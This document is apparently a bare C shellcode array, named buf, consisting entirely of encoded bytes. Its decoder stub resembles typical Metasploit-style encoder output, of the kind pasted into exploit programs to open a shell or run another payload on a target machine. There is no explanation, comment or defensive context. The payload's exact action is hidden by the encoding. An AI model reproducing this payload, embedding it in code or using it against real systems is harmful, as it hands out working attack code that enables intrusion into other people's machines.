unsigned char buf[] = 
"\xdb\xd1\xbe\xad\xd0\xb4\x7d\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x52\x83\xeb\xfc\x31\x73\x13\x03\xde\xc3\x56\x88\xdc\x0c\x14"
"\x73\x1c\xcd\x79\xfd\xf9\xfc\xb9\x99\x8a\xaf\x09\xe9\xde\x43"
"\xe1\xbf\xca\xd0\x87\x17\xfd\x51\x2d\x4e\x30\x61\x1e\xb2\x53"
"\xe1\x5d\xe7\xb3\xd8\xad\xfa\xb2\x1d\xd3\xf7\xe6\xf6\x9f\xaa"
"\x16\x72\xd5\x76\x9d\xc8\xfb\xfe\x42\x98\xfa\x2f\xd5\x92\xa4"
"\xef\xd4\x77\xdd\xb9\xce\x94\xd8\x70\x65\x6e\x96\x82\xaf\xbe"
"\x57\x28\x8e\x0e\xaa\x30\xd7\xa9\x55\x47\x21\xca\xe8\x50\xf6"
"\xb0\x36\xd4\xec\x13\xbc\x4e\xc8\xa2\x11\x08\x9b\xa9\xde\x5e"
"\xc3\xad\xe1\xb3\x78\xc9\x6a\x32\xae\x5b\x28\x11\x6a\x07\xea"
"\x38\x2b\xed\x5d\x44\x2b\x4e\x01\xe0\x20\x63\x56\x99\x6b\xec"
"\x9b\x90\x93\xec\xb3\xa3\xe0\xde\x1c\x18\x6e\x53\xd4\x86\x69"
"\x94\xcf\x7f\xe5\x6b\xf0\x7f\x2c\xa8\xa4\x2f\x46\x19\xc5\xbb"
"\x96\xa6\x10\x6b\xc6\x08\xcb\xcc\xb6\xe8\xbb\xa4\xdc\xe6\xe4"
"\xd5\xdf\x2c\x8d\x7c\x1a\xa7\xb8\x8b\x24\xda\xd5\x89\x24\x25"
"\x9d\x07\xc2\x4f\xf1\x41\x5d\xf8\x68\xc8\x15\x99\x75\xc6\x50"
"\x99\xfe\xe5\xa5\x54\xf7\x80\xb5\x01\xf7\xde\xe7\x84\x08\xf5"
"\x8f\x4b\x9a\x92\x4f\x05\x87\x0c\x18\x42\x79\x45\xcc\x7e\x20"
"\xff\xf2\x82\xb4\x38\xb6\x58\x05\xc6\x37\x2c\x31\xec\x27\xe8"
"\xba\xa8\x13\xa4\xec\x66\xcd\x02\x47\xc9\xa7\xdc\x34\x83\x2f"
"\x98\x76\x14\x29\xa5\x52\xe2\xd5\x14\x0b\xb3\xea\x99\xdb\x33"
"\x93\xc7\x7b\xbb\x4e\x4c\x8b\xf6\xd2\xe5\x04\x5f\x87\xb7\x48"
"\x60\x72\xfb\x74\xe3\x76\x84\x82\xfb\xf3\x81\xcf\xbb\xe8\xfb"
"\x40\x2e\x0e\xaf\x61\x7b";
